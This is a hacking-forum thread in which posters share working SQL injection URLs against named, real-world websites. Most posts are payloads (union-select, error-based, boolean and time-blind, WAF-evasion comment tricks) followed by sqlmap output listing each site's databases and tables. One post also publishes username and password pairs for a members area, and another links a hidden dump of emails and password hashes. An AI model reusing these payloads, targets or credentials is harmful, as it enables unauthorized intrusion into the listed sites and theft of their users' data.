SQL Injections

Discussion in 'Vulnerabilities' started by yarbabin, 27 Apr 2015.

  1. cat1vo

    cat1vo Level 8

    Code:
    http://adamslove.org/en-d.php?id=85'+or+1+group+by+mid(version(),rand(0)|0)having+avg(0)%23
    MySQL error: 1062 (Duplicate entry '5.5.51-38.2' for key 'group_key')
    Where is the Blind here? Or do you always rely only on sqlmap? And yes, Mod_security is present there, so we use non-standard whitespace and wrap the operators in version comments (example: /*!12345union*/%0aselect)!
     
  2. sepo

    sepo Member

    Sorry for the flood, but why the hell post links to vulnerable sites if you can't even exploit the vulnerability yourself?


    And now, on topic:

    Code:
    http://www.imrs.rs/index.php?id=-67+union+select+1,2,3,4,5,database(),7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21--
     
    #162 sepo, 13 Aug 2017
    Last edited: 13 Aug 2017
  3. joelblack

    joelblack Reservists Of Antichat

    target: http://www.tissueeng.net
    type: SQL Injection
    Code:
    http://www.tissueeng.net/lab/peopleDetail.php?id=-424+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,version(),7--+

    user: tissueen_erikp@localhost
    version: 5.6.32-78.1-log
     
  4. SlipX

    SlipX New Member

    http://www.kandiusa.com/product_list.php?id=1
    Database: kandiusa
    +---------+---------+
    | Table | Entries |
    +---------+---------+
    | custom | 8877 |
    | product | 4703 |
    | orderm | 3843 |
    | parts | 597 |
    | class | 372 |
    | sort | 76 |
    | wty | 3 |
    | admn | 2 |
    | reg | 1 |
    +---------+---------+

    http://www.cambridgesilversmiths.com/browse/detail.php?id=2504
    available databases [48]:
    [*] CamSilWeb
    [*] Crystal
    [*] cs_dev_ecommSQL
    [*] cs_ecommSQL
    [*] CZOC
    [*] d2
    [*] Data_005
    [*] DATA_020
    [*] DATA_021
    [*] DATA_022
    [*] DATA_55
    [*] DATA_56
    [*] DATA_999_ARCHIVE
    [*] DATA_ARCHIVE
    [*] DataLF
    [*] DemoSynergy
    [*] distribution
    [*] EDI_2
    [*] EDI_CS_TEMP
    [*] EEDI_CS
    [*] FedEx
    [*] GENTRANDatabase
    [*] Issues
    [*] KS_Inbox
    [*] KS_Object
    [*] master
    [*] model
    [*] msdb
    [*] msllockdb
    [*] Northwind
    [*] pubs
    [*] PWE
    [*] Screens
    [*] Spanish
    [*] swWorkFlow
    [*] Synergy
    [*] TaxTables
    [*] tempdb
    [*] Ticketing
    [*] UPS
    [*] vendor_dev
    [*] vendor_test
    [*] VendorLF
    [*] vpEDI_Company
    [*] zWMS_CA
    [*] zWMS_dev
    [*] zWMS_PreMigration
    [*] zWMS_Test_NJ

    http://www.pinoy-market.com/store.php?id=136
    available databases [5]:
    [*] information_schema
    [*] mysql
    [*] ofertas
    [*] pinoy
    [*] test


    http://www.ecgi.de/wp/wp_id.php?id=213
    available databases [3]:
    [*] db1081552-ecgi1
    [*] db1081552-ecgi2
    [*] information_schema


    Http://www.kupa.pl/pl/humor.php?id=16
    available databases [1]:
    [*] baza777

    // Don't flood the thread with identical messages.
    // Combine them into one post; don't create extra work for the moderators.
    // ВВ
     
    #164 SlipX, 19 Aug 2017
    Last edited by a moderator: 19 Aug 2017
  5. SlipX

    SlipX New Member

    tvet.ps/home.php?org=43
    available databases [2]:
    [*] information_schema
    [*] tvetps_db
     
  6. sepo

    sepo Member

    Code:
    http://www.pizzifarm.com/printerfriendly.php?id=-25+union+select+version()+--+
    4.1.20
     
  7. sepo

    sepo Member

    ЗАО НПЦ «АСПЕКТ»

    Code:
    http://aspect.dubna.ru/new/news.php?id=-222+union+select+@@version--
     
  8. RWD

    RWD Member

    Code:
    http://www.immobilien-bender.com/download_blob.php?ID_KATALOG_FILE=99' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a787a71,0x556a6d655550696468517a6654417a59597750744f654b7164566e64624876594f58704345774b72,0x7170706a71),NULL,NULL,NULL,NULL,NULL-- WNxl
     
  9. SlipX

    SlipX New Member

    http://mycompaniesact.com/orders.php?id=401
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=401' AND 5514=5514 AND 'bTax'='bTax
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=401' AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(9875=9875,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'niid'='niid
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=401' AND SLEEP(5) AND 'TmYG'='TmYG
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 8 columns
        Payload: id=401' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627871,0x4975495a54675364526f6847444d55556c714d507361564a62794f486f5242756f6b65674d436f48,0x7162717a71)-- srbU
    ---
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.7, PHP 5.5.9
    back-end DBMS: MySQL >= 5.0
    available databases [24]:
    [*] cashflow
    [*] cashflowblog
    [*] cim
    [*] complyzone
    [*] complyzoneblog
    [*] gstcomplyzone
    [*] gstseekho
    [*] gstseekhoapp
    [*] information_schema
    [*] mppcos
    [*] mycompaniesact
    [*] mycompaniesact_blog
    [*] mysql
    [*] performance_schema
    [*] permier
    [*] phpmyadmin
    [*] punitecom
    [*] rishab
    [*] sammiraman
    [*] ssluthra
    [*] trackmyinvoice
    [*] uniqueshiksha
    [*] unocalecom
    [*] Vendor_Payment_Generation
     
  10. SlipX

    SlipX New Member

    Unfortunately yes, I'm not that strong at this, I don't even know where to start.
    If only someone would teach me :)


    http://www.sfgames.ru/gameS.php?id=232

    Code:
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=232 AND 5858=5858
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=232 AND SLEEP(5)
    ---
    [18:55:32] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.2.17
    back-end DBMS: MySQL >= 5.0.12
     
    #170 SlipX, 6 Oct 2017
    Last edited: 6 Oct 2017
  11. RWD

    RWD Member

    Code:
    https://video.bbb.org/vncSearch.php?category=13 UNION ALL SELECT NULL,CONCAT(0x716a6a7671,0x644b4861496f585455585368634d4e6c55486a437768767250584955436345504149454674624f61,0x716a786b71),NULL,NULL,NULL,NULL-- ERFG&bureauId=
    available databases [3]:
    [*] bbbvideo
    [*] information_schema
    [*] test
    
     
  12. karkajoi

    karkajoi Well-Known Member

    Code:
    http://de.u7buy.com/news/news.html?date=2016-09%' AND 1010=1010 AND '%'='
    available databases [1]:
    [*] u7buy_dbs
    
     
  13. RWD

    RWD Member

    Code:
    http://smmmafia.com/gobig/tnsnfri/rcknrol.php?geo=US' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x6e4e5a72734174575a6f6946495a77786d4142695a6c6b5a594c647a6b6946414657426479557962,0x71767a6b71)-- hajN
    Any ideas what this site is and what it's for?
     
  14. SlipX

    SlipX New Member

    http://www.vpscro.com/cn/about.php?id=166
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=166 AND 3378=3378
    
        Type: error-based
        Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
        Payload: id=166 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171627071,(SELECT (ELT(2938=2938,1))),0x7178627071,0x78))s), 8446744073709551610, 8446744073709551610)))
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=166 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 12 columns
        Payload: id=-4940 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x794e677a4367776d4c75676a55677158705a414c684b44686c4b67546f545979546e4d636c594a53,0x7178627071),NULL,NULL,NULL,NULL,NULL-- FkYN
    ---
    web server operating system: Windows 2008 or Vista
    web application technology: ASP.NET, PHP 5.5.10, Microsoft IIS 7.0
    back-end DBMS: MySQL >= 5.5
    available databases [18]:
    [*] bugtracker
    [*] dzzoffice
    [*] eyao
    [*] hdm0130219_db
    [*] hdm0580028_db
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] pigcms
    [*] test
    [*] tsoa
    [*] ucenter
    [*] uchome
    [*] vp_phpcms
    [*] vp_xcx
    [*] vppr
    [*] wecenter
    [*] wqjk
     
  15. karkajoi

    karkajoi Well-Known Member

    I can't get the columns out of the tables; whoever manages it, send me the vector via PM.
    Accounts for logging in (it won't work without them):
    Code:
    hopkins123:hopkins1
    KlausuPirelli:pirelli1
    Vishnu24:Ackbar24
    momoneyg08:wordupho
    
    Code:
    http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+and+updatexml(NULL,concat(0x3a, ( select database()) ),Null)-- -&template_set=3
    XPATH syntax error: ':sitedepth'
    
    http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2)))-- -&template_set=3
    Duplicate entry 'sitedepth1' for key 'group_key'
    
    tables:
    userman
    site_settings
    users
    
     
  16. SlipX

    SlipX New Member

    http://www.golf-in-japan.com/course.php?ID=372
    + DB: mail, hash, username
    [HIDE]
    https://yadi.sk/i/pxTpczCR3NmKpt
    [/HIDE]

    Code:
    ---
    Parameter: ID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: ID=372 AND 5008=5008
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: ID=372 AND (SELECT 1815 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1815=1815,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: ID=372 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 32 columns
        Payload: ID=-3043 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7071,0x6f49475068796d43755072586e44506f504d575573424141775657754b625a7368574a554c6a6678,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uzrc
    ---
    web server operating system: Linux Ubuntu 16.04 (xenial)
    web application technology: Apache 2.4.18
    back-end DBMS: MySQL >= 5.0
    available databases [2]:
    [*] gij_db
    [*] information_schema
     
    #176 SlipX, 15 Oct 2017
    Last edited: 15 Oct 2017
  17. SlipX

    SlipX New Member

    http://www.odontoprimegroup.com/about.php?id=4
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
        Payload: id=4' OR NOT 9339=9339#
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=4' AND SLEEP(5)-- iguT
    ---
    web application technology: Apache, PHP 5.4.22
    back-end DBMS: MySQL >= 5.0.12
    available databases [2]:
    [*] information_schema
    [*] odonto_odo
    
     
  18. Dri-M

    Dri-M New Member

    http://remiremont.fr/associations/detail.php?id=68
    Code:
    ---
    Parameter: id (GET)
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=68 OR (SELECT 8037 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(8037=8037,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=68 OR SLEEP(10)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 11 columns
        Payload: id=68 UNION ALL SELECT NULL,CONCAT(0x7176627071,0x674772756c78427a446a6248755a6e67426e6c47675a546e5449546456755a7257426c534b6b7961,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RzWd
    ---
    http://gloomysunday.hu/shop.php?id=9
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: id=-7104 OR 6087=6087#
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=9 AND (SELECT 5231 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(5231=5231,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=9 OR SLEEP(10)
    ---
     
  19. sepo

    sepo Member

    New Jersey State Opera
    Code:
    http://www.njstateopera.org/news.php?id=-6+union+select+1,2,version(),4,database(),6,7,user()--
     
  20. Muracha

    Muracha Member

    Code:
    http://www.salut.ru/ViewTopic.php?Id=2325
    http://www.salut.aero/info.php
    view-source:http://www.salut.ru/ViewTopic.php?Id=-2325%27+union+select+1,2,3,user(),5,6,database(),version(),9,10,11,12,13,14,15,16%20--%20ccv
    | 5.1.67-0ubuntu0.10.04.1 | salut | salut@localhost
     